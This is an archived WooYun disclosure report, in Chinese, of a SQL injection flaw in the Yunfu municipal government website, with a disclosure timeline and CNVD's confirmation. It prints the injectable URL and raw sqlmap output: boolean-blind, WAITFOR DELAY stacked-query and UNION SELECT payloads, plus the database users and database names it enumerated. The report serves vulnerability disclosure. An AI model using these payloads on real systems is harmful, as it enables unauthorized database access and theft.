乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-15: 细节已通知厂商并且等待厂商处理中 2015-10-19: 厂商已经确认,细节仅向厂商公开 2015-10-29: 细节向核心白帽子及相关领域专家公开 2015-11-08: 细节向普通白帽子公开 2015-11-18: 细节向实习白帽子公开 2015-12-03: 细节向公众公开
云浮市政府SQL注入漏洞
注射点 http://**.**.**.**/ReadNews.asp?NewsID=1042&AreaID=8&BigClassID=17&SpecialID=0
[*] data=[{u'status': 1, u'type': 0, u'value': [{u'dbms': [u'Microsoft SQL Server', u'Sybase'], u'suffix': u'', u'clause': [1], u'ptype': 1, u'dbms_version': None, u'prefix': u'', u'place': u'GET', u'data': {u'1': {u'comment': u'', u'matchRatio': 0.614, u'title': u'AND boolean-based blind - WHERE or HAVING clause', u'templatePayload': None, u'vector': u'AND [INFERENCE]', u'where': 1, u'payload': u'NewsID=1042 AND 1586=1586&AreaID=8&BigClassID=17&SpecialID=0'}, u'4': {u'comment': u'--', u'matchRatio': 0.614, u'title': u'Microsoft SQL Server/Sybase stacked queries (comment)', u'templatePayload': None, u'vector': u";IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'", u'where': 1, u'payload': u"NewsID=1042;WAITFOR DELAY '0:0:[SLEEPTIME]'--&AreaID=8&BigClassID=17&SpecialID=0"}, u'6': {u'comment': u'-- ', u'matchRatio': 0.614, u'title': u'Generic UNION query (NULL) - 1 to 20 columns', u'templatePayload': None, u'vector': [5, 26, u'-- ', u'', u'', u'NULL', 2, False, False], u'where': 2, u'payload': u'NewsID=-2535 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(117)+CHAR(77)+CHAR(101)+CHAR(100)+CHAR(69)+CHAR(104)+CHAR(77)+CHAR(114)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &AreaID=8&BigClassID=17&SpecialID=0'}}, u'conf': {u'string': None, u'notString': None, u'titles': False, u'regexp': None, u'textOnly': False, u'optimize': False}, u'parameter': u'NewsID', u'os': u'Windows'}]}, 用户{u'status': 1, u'type': 7, u'value': [u'BUILTIN\\\\Administrators', u'ggk', u'h154192', u'sa', u'yfgh']}, 数据库{u'status': 1, u'type': 11, u'value': [u'ggktest', u'master', u'model', u'msdb', u'Northwind', u'pubs', u'tempdb', u'yfgh']}]
危害等级:高
漏洞Rank:10
确认时间:2015-10-19 18:17
CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。
暂无